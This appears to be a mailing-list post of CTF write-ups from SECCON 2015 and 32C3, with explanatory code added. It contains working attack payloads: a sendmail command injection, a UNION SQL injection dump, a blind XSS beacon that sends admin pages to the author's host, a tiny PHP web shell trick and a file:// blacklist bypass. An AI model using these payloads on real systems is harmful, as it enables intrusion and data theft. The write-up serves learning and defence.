[oss] Seccon CTF and 32C3

Cernica ionut.cernica at gmail.com
Mon Jan 4 13:48:39 EET 2016


Hello,

The qualifications for Seccon CTF were on December 5 to 6. The top 10 teams
and 3 other teams that won 1st place in other competitions will qualify for
the finals in Japan on January 31, 2016.
There were plenty of teams, and we participated with the team
PwnThyBytes.

Rank Score Team
1    6323  217
2    6306  GoatskiN
3    6302  PPP
4    5302  m1z0r3
5    5003  0x0
6    4800  PwnThyBytes
7    4702  Shellphish
8    4700  CodeRed
9    4600  KaSecon
10   4505  Bushwhackers


Team members are: Silviu, Radu, Codrut, Ionut, Vladimir, Catalin, Silvia,
Filip, Alex, Vali, Osiris.
We solved 85% of the tasks. I don't know exactly what each member did because
we mostly worked in pairs, but I'll say what I did:

Given the large number of members, I worked together with Catalin Irimie on
many tasks.
Most of the tasks were solved with Catalin Irimie:

[1] Connect the server  (Solved by 587)
This was an easy task. All I had to do was start tcpdump and connect to the
server; when I looked at the tcpdump output I found the flag.


[2] Entry form  (Solved by 189)
This was an easy task too, because as soon as I looked at the URL "
entryform.pwn.seccon.jp/register.cgi" I told Catalin that this should be
Shellshock or Perl command execution. He managed to find the source code
and the following line got our attention:
"open(SH, "|/usr/sbin/sendmail -bm '".$q->param("mail")."'");"
A system command is dynamically constructed with unfiltered user input. All we
had to do was inject a new command and read the output:
/register.cgi?name=notempty&mail='%20-bp|ls%20%23

Then we found the flag.
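The defect above in a runnable form: an added example (not the challenge's code) that rebuilds the sendmail command string the way the Perl line did, decodes the write-up's payload into it, and contrasts that with a hypothetical validated, shell-free argv builder.

```python
import re
from urllib.parse import unquote

# Constructed stand-in for the challenge's register.cgi. The Perl line
#   open(SH, "|/usr/sbin/sendmail -bm '".$q->param("mail")."'")
# hands this exact string to /bin/sh, so the "mail" value is shell syntax.
def vulnerable_sendmail_command(mail: str) -> str:
    return "/usr/sbin/sendmail -bm '" + mail + "'"

# Hypothetical conservative address policy: must start with a letter or digit
# (so it can never be read as an option like -bp), one local part, one domain,
# and no quotes, whitespace or shell metacharacters anywhere.
MAIL_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

def safe_sendmail_argv(mail: str) -> list:
    """Validate the address, then return an argv list to be run WITHOUT a
    shell (subprocess.run(argv, input=body) in Python, list-form open in Perl),
    so no part of the user value is ever parsed as a command."""
    if not MAIL_RE.fullmatch(mail):
        raise ValueError("invalid recipient address")
    return ["/usr/sbin/sendmail", "-bm", mail]

# The write-up's payload, URL-decoded: a quote that closes the argument, a new
# option, a pipe to a second command, and '#' that comments out the trailing quote.
PAYLOAD = unquote("'%20-bp|ls%20%23")   # -> "' -bp|ls #"
```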


[3] Bonsai XSS Revolutions  (Solved by 49)
For this task the organizer gave us an .exe file that "simulated" an
administrator looking at his emails in his "email client". At first
glance we thought we should set up a DNS resolver and use the seccon.jp IP
address to resolve "tsuribori.test", and then send an email to
"keigo.yamazaki@tsuribori.test".

After a while I figured out that the .exe file creates an SMTP server
that listens on port 25, and all we had to do was send emails to localhost;
the administrator would see the emails we sent.
We created a Python script that sends emails. After some tests we found an
XSS in the "Date" parameter. We used that XSS to print the source code of the
HTML page with "alert()", and we saw that the browser's User-Agent is
rewritten:
"<html>(...)<body>
<script>var navigator=new Object;navigator.userAgent='This is NOT a flag.
Use XSS to obtain it.';</script>(...)"

This problem has many solutions:
a. I told Catalin that we could open the .exe file with JavaScript disabled
in IE; then the code "<script>var navigator=new
Object;navigator.userAgent='This is NOT a flag. Use XSS to obtain
it.';</script>" wouldn't execute anymore. After the .exe file was opened
and the page was loaded, we just enabled JavaScript and printed the User-Agent.

b. Open a new tab and load an image at ip:port. We should find the flag in
the User-Agent.


[4] Reverse-Engineering Android APK 2  (Solved by 11)
Many team members worked on this task: Silviu Popescu reversed the APK and
found the authentication flow. The APK uses AES/ECB to encrypt the data of
each request to the server.
With tcpdump we extracted the requests to the server and saw what we
should send to it.
We wrote a Python script that sent all the user data to the server encrypted
and used it to find another security vulnerability.
  They gave us a hint: "The key is stored in the application, but you will
need to hack the server.", but we already knew that.
We found an SQL injection in the "email" parameter. It was a blind SQL
injection, but Catalin had an idea to make it simple. We extracted the
password of our account (stored in the database) and used it to extract data
from the database.
With the following payload we extracted all the unique_ids from the database:
&email=seccontest2@mailinator.com' and 1=2 union all select 215,
'3809f46bc99ed836cd29eaf', NULL, NULL, BINARY
'X22dCZC6XbcwSHRN4NWR8XVYNbw2MzY0NDk1ZTJl', '6364495e2e', (select
group_concat(unique_id) from users),NULL FROM users#

Having all the unique_ids, we wrote a script to decrypt (AES/ECB) the flag
with each unique_id extracted from the database, and one of the lines was our
flag: "SECCON{6FgshufUTpRm}"
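The UNION-based extraction described above, reproduced on a constructed SQLite table as an added example (not the challenge server's code): the string-built lookup lets a payload in the shape of the write-up's return every unique_id in one row, while the parameterised version treats the same value as a literal. SQLite's comment syntax is "--" rather than the "#" used against the MySQL server.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample users table with the columns the payload relies on."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, email TEXT, password TEXT, unique_id TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice@example.com", "pw-alice", "UID-ALICE"),
        (2, "bob@example.com", "pw-bob", "UID-BOB"),
        (3, "seccontest2@mailinator.com", "pw-ours", "UID-OURS"),
    ])
    return con

def lookup_vulnerable(con: sqlite3.Connection, email: str, password: str) -> list:
    # String-built query: whatever is in email becomes SQL syntax.
    sql = ("SELECT id, email, unique_id FROM users "
           f"WHERE email='{email}' AND password='{password}'")
    return con.execute(sql).fetchall()

def lookup_safe(con: sqlite3.Connection, email: str, password: str) -> list:
    # Parameterised query: the same payload is a string that matches no row.
    sql = "SELECT id, email, unique_id FROM users WHERE email=? AND password=?"
    return con.execute(sql, (email, password)).fetchall()

# Constructed payload in the shape of the write-up's: falsify the WHERE clause,
# UNION in one row whose last column is every unique_id joined by group_concat,
# and comment out the rest of the original statement.
PAYLOAD = ("seccontest2@mailinator.com' AND 1=2 UNION ALL "
           "SELECT 215, 'x', (SELECT group_concat(unique_id) FROM users) -- ")
```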



[5] Please give me MD5 collision files  (Solved by 5)
This task was very interesting and hard, and it was solved because Catalin
insisted on solving it.

They gave us an application where you submit two different files with the
same MD5 (other teams could do that too). The application would compute
length=len(file1)+len(file2), and if that length was the lowest in the
game and you survived 30 min in first place, you would obtain the flag.

Suppose team1 found md5("123456789")=md5("1234567"), the total length would
be 16
1. md5.valueOfTeam1    len 16

Suppose team2 found md5("1234567890")=md5("12345670"), the total length
would be 18
1. md5.valueOfTeam1    len 16
2. md5.valueOfTeam2    len 18

Suppose team3 found md5("123456789000")=md5("1234567000"), the total length
would be 20
1. md5.valueOfTeam1    len 16
2. md5.valueOfTeam2    len 18
3. md5.valueOfTeam3    len 20

Suppose team4 found md5("1234567")=md5("123456"), the total length would be
13
1. md5.valueOfTeam4    len 13
2. md5.valueOfTeam1    len 16
3. md5.valueOfTeam2    len 18
4. md5.valueOfTeam3    len 20

Team4 has to stay 30 min in first place to get the flag.


Another twist of the game is that if you find Team4's MD5 input,
 md5("1234567"), you can submit it and remove them from first place,
and the hash goes to a blacklist (it can't be used again).
If Team(n) submitted Team4's MD5, the scoreboard would be:
2. md5.valueOfTeam1    len 16
3. md5.valueOfTeam2    len 18
4. md5.valueOfTeam3    len 20


The tactic here was to find two different files whose MD5s collide, and we
found them. The length was 64.
Because the length was 64, you could construct other files that are
different but have the same MD5:
Suppose md5("a"*4) = md5("b"*64); then md5("a"*4 + ord(i)) = md5("b"*64 +
ord(i)), 0<=i<256
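Why a common suffix keeps a collision alive, shown on a toy Merkle-Damgard hash as an added example (not the write-up's files or a real MD5 collision, which cannot be built here): once two distinct full-block messages reach the same chaining state, everything appended afterwards is processed identically on both sides, which is exactly what let the 64-byte pair be turned into 256 new pairs. The 16-bit state and 4-byte block are assumptions that make collisions cheap to find; MD5 has a 128-bit state and 64-byte blocks.

```python
import hashlib

BLOCK = 4        # toy block size in bytes (MD5 uses 64)
IV = 0x1234      # toy initial chaining state, 16 bits (MD5 uses 128)

def compress(state: int, block: bytes) -> int:
    """Toy compression function; MD5 is used only as a convenient mixer."""
    h = hashlib.md5(state.to_bytes(2, "big") + block).digest()
    return int.from_bytes(h[:2], "big")

def toy_md(msg: bytes) -> int:
    """Merkle-Damgard construction: pad with 0x80, zeros and a length byte,
    then run compress() over each block, chaining the state."""
    padded = msg + b"\x80"
    padded += b"\x00" * ((-len(padded) - 1) % BLOCK)
    padded += (len(msg) % 256).to_bytes(1, "big")
    state = IV
    for i in range(0, len(padded), BLOCK):
        state = compress(state, padded[i:i + BLOCK])
    return state

def find_block_collision() -> tuple:
    """Birthday search for two distinct single-block messages with the same
    chaining state after one block (about 300 tries for a 16-bit state)."""
    seen = {}
    for i in range(1 << 24):
        m = i.to_bytes(BLOCK, "big")
        s = compress(IV, m)
        if s in seen:
            return seen[s], m
        seen[s] = m
    raise RuntimeError("no collision found")

def extend_collision(a: bytes, b: bytes, suffix: bytes) -> bool:
    """The write-up's md5(x + ord(i)) = md5(y + ord(i)) property: for two
    equal-length full-block messages whose chaining states collide, appending
    the same suffix (and hence the same padding) leaves the digests equal."""
    assert len(a) == len(b) == BLOCK and a != b
    return toy_md(a + suffix) == toy_md(b + suffix)
```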

There are 3 public pairs of files that have the same MD5 and are the
shortest found so far. Several teams found all 3 pairs and ruled the game (but
no one stayed 30 min, because the MD5s were easy to find and invalidate) until
the organizers decided to remove the time constraint.


After we found out we didn't have to stay 30 min in first place, we submitted
2 files with the same MD5 and length 65+65, and then we started to invalidate
the others' MD5s and got our flag.




32C3 CTF
Last week I participated in 32C3 CTF alone and solved some web tasks.
The CTF started on 27 Dec. and ended on 29 Dec. (48h).
Top 3 are:
pasten          7350
Dragon Sector   6200
First Order     5100

I registered an account and played alone, for fun, for a few hours, because I
went to some presentations (btw, I enjoyed Perl Jam 2 the most).

At the CTF I solved 4 tasks:
Kummerkasten 300  Solves: 61
TinyHosting  250  Solves: 71
MonkeyBase   200  Solves: 26
ITD          150  Solves: 11

[1] Kummerkasten
When I visited the URL from the description I saw a contact form, which
told me there could be a blind XSS behind it.
I inserted in the "body" parameter: <img src="my_ip:2222" /> and with nc I
listened for any incoming connection. The connection was made as soon as I
sent the request to the administrator.
After a few tests I found that it was an XSS with no restriction. Knowing
that, I just sent myself the source code of the administrator page and saw
some more sections:
/admin/bugs
/admin/token
Getting the HTML source code of those pages, I noticed 2 images:
/admin/img/root_pw.png?20151228
/admin/img/token.png?20151228

I sent the content of the images to my server and, combining the two strings
obtained from the images, I got the flag: 1_4m_numb3r_0n3!629880


[2] TinyHosting
This time I had a file upload where I could upload any file with any
extension, but the content could only be 7 bytes long.
I had to make a PHP shell that is 7 bytes.
The solution was:
a. upload a file test.php with the content:   <?=`*`;
b. then make some files, one named "eval" and another one named
"echo '<?php echo system($_GET[1]);?>' > shell.php"
c. when I visit the tiny shell test.php, it will execute "<?=`*`".
This code lists all the files in the directory, sorted alphabetically,
takes the first name combined with the others, and executes it as a
system command.
My files in that directory are:
eval
echo '<?php echo system($_GET[1]);?>' > shell.php
index.html
test.php

When test.php is invoked, the following commands are executed on
the server side:
eval "echo '<?php echo system($_GET[1]);?>' > shell.php"
eval "index.html"
eval "test.php"

The first one creates a PHP shell named shell.php, and then I can send any
system command and see the output. The rest is history.

[3] MonkeyBase
This wasn't a hard task, but I had some problems because of lots of red
herrings.
The web application had lots of functionality and I had to check for SQL
injection, blind XSS, remote command execution, PHP unserialize, and
hash length extension. In the end it was a file inclusion (I think I could
have obtained RCE, but it wasn't necessary). With that file inclusion I
obtained the flag from one of the PHP source files.

[4] ITD
This was an interesting task. It was possible to use "file_get_contents" to
read files, but they blocked most of the PHP wrappers. The problem was that
when they tried to block the "file" wrapper, they blacklisted "file:///", but
it is possible to use "file://localhost/etc/passwd" to read local files.
The blacklist is:
$w = array('<','>','\.\.','^/+.*','file:///','php://','data://','zip://','ftp://','phar://','zlib://','glob://','expect://');
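The blacklist above, replayed in Python as an added example (not the challenge's PHP): it assumes the entries were applied as regular expressions, since '\.\.' and '^/+.*' only make sense that way, and shows that "file://localhost/..." passes every pattern, next to a hypothetical allowlist check that rejects any scheme and confines the path to a base directory.

```python
import os
import re

# The write-up's blacklist, assumed to be applied preg_match-style (regexes).
BLACKLIST = ['<', '>', r'\.\.', '^/+.*', 'file:///', 'php://', 'data://',
             'zip://', 'ftp://', 'phar://', 'zlib://', 'glob://', 'expect://']

def blacklist_allows(path: str) -> bool:
    """The challenge's approach: allow everything that matches no known-bad pattern."""
    return not any(re.search(pat, path) for pat in BLACKLIST)

# Hypothetical hardened check (assumed base directory): no "://" at all, no
# absolute path, a tight character set, and the normalised result must stay
# under the base. String-level only; pair it with os.path.realpath() on disk
# so symlinks cannot escape either.
def resolve_allowed(path: str, base: str = "/var/www/app/public"):
    if "://" in path or path.startswith("/") or not re.fullmatch(r"[A-Za-z0-9_./-]+", path):
        return None
    full = os.path.normpath(os.path.join(base, path))
    if not full.startswith(base + os.sep):
        return None
    return full
```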


Knowing how to read files, I found the path to the flag. I had to execute a
binary, and if that binary returned "LOOSE" the PHP script would stop; else
it would give me the flag.
There were many solutions here. I chose to submit lots of requests on 10
threads until one of the executions failed and did not return any string to
the PHP script.
I made a Python script that sends requests on 10 threads until one of the
responses gave me the flag.

All the best,
Cernica Ionut